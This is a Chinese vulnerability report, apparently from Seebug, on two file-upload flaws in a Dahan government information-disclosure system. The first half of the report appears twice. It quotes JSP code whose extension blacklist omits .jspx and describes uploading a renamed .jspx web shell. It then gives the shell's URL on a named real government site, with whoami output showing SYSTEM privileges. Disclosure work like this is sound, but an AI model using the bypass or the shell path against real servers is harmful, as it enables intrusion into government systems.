### 简要描述: 大汉版通某个系统存在两处文件上传,可Getshell ### 详细说明: #1 漏洞文件 总共存在两处文件上传,路径如下 ``` /xxgk/m_5_5/m_5_5_3/upload.jsp /xxgk/m_5_5/m_5_5_3/import_style.jsp ``` 选择其一贴下漏洞代码 ``` <% ListTable listtable = new ListTable(request); out.println(listtable.getListTableCssJs()); sys.initSysPara(request); //*得到用户信息*/ Merp_Pub_UserEntity userentity = UserRightBLF.getUserInfo(request); String strFilePath = application.getRealPath("") + "/m_5_5/m_5_5_3/temphttps://images.seebug.org/upload/";//上传文件保存的路径 Convert.createDirectory(strFilePath); CommonUploadFile upload = new CommonUploadFile(strFilePath, ""); boolean bl = false; String[] strFiles = null; try { SysInit.init(); if (SysInit.m_strImportNoFileType == null) { upload.setM_Notfiletype("exe,com,bat,php,asp,php3,phtml,jsp,aspx"); } else { upload.setM_Notfiletype(SysInit.m_strImportNoFileType); } bl = upload.uploadFile(request); } catch (Exception e) { } if (bl) { StyleParse sp = new StyleParse(sys.appId, sys.webId); sp.setUserentity(userentity); String...
### 简要描述: 大汉版通某个系统存在两处文件上传,可Getshell ### 详细说明: #1 漏洞文件 总共存在两处文件上传,路径如下 ``` /xxgk/m_5_5/m_5_5_3/upload.jsp /xxgk/m_5_5/m_5_5_3/import_style.jsp ``` 选择其一贴下漏洞代码 ``` <% ListTable listtable = new ListTable(request); out.println(listtable.getListTableCssJs()); sys.initSysPara(request); //*得到用户信息*/ Merp_Pub_UserEntity userentity = UserRightBLF.getUserInfo(request); String strFilePath = application.getRealPath("") + "/m_5_5/m_5_5_3/temphttps://images.seebug.org/upload/";//上传文件保存的路径 Convert.createDirectory(strFilePath); CommonUploadFile upload = new CommonUploadFile(strFilePath, ""); boolean bl = false; String[] strFiles = null; try { SysInit.init(); if (SysInit.m_strImportNoFileType == null) { upload.setM_Notfiletype("exe,com,bat,php,asp,php3,phtml,jsp,aspx"); } else { upload.setM_Notfiletype(SysInit.m_strImportNoFileType); } bl = upload.uploadFile(request); } catch (Exception e) { } if (bl) { StyleParse sp = new StyleParse(sys.appId, sys.webId); sp.setUserentity(userentity); String strXMLFile = ""; strFiles = upload.getAllFileName(); if (strFiles != null) { for (int i = 0; i < strFiles.length; i++) { strXMLFile = strFilePath + strFiles[i]; //解析xml文件 sp.importStyle(strXMLFile); } } } ``` 重点在这几行 ``` String strFilePath = application.getRealPath("") + "/m_5_5/m_5_5_3/temphttps://images.seebug.org/upload/";//上传文件保存的路径 //... if(SysInit.m_strImportNoFileType == null) { upload.setM_Notfiletype("exe,com,bat,php,asp,php3,phtml,jsp,aspx"); } else { upload.setM_Notfiletype(SysInit.m_strImportNoFileType); } ``` 很明显,程序采用了黑名单限制文件的上传,如下 upload.setM_Notfiletype("exe,com,bat,php,asp,php3,phtml,jsp,aspx"); 这让我们没有办法上传jsp格式的文件(暂不考虑其它的绕过情况) 但是你们知道吗? jspx 同样可以解析为jsp #2 漏洞测试 ok 那接下来进行漏洞的测试 随机在互联网上选取案例进行测试,这里为 ``` http://xxgk.weifang.gov.cn/xxgk/m_5_5/m_5_5_3/import_style.jsp ``` 如图所示 [<img src="https://images.seebug.org/upload/201405/162208199205adbec6736a20626525122f2bb37c.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/162208199205adbec6736a20626525122f2bb37c.jpg) 我们将xiao.jspx 改名为xiao.xml 上传.. 提交后抓包修改文件名为1.jspx即可,如下图所示 [<img src="https://images.seebug.org/upload/201405/16221258c19b15869cb3b4aaac5ca0112d098d55.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/16221258c19b15869cb3b4aaac5ca0112d098d55.jpg) 此时已经在 /m_5_5/m_5_5_3/temphttps://images.seebug.org/upload/ 目录下生成了xiao.jspx 访问下 成功 [<img src="https://images.seebug.org/upload/201405/16221424b414ea9b0f2832d1bd2fa66e286166a6.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/16221424b414ea9b0f2832d1bd2fa66e286166a6.jpg) ### 漏洞证明: #连接shell ``` http://xxgk.weifang.gov.cn/xxgk//m_5_5/m_5_5_3/temphttps://images.seebug.org/upload/xiao.jspx ``` 如图所示 [<img src="https://images.seebug.org/upload/201405/1622170850ab08d0a46ced655573cd7cd6180c85.jpg" alt="4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/1622170850ab08d0a46ced655573cd7cd6180c85.jpg) 最高权限哦 ``` [*] 基本信息 [ A:C:D:E:F: ] D:\*****\tomcat\webapps\xxgk\> whoami nt authority\system ```
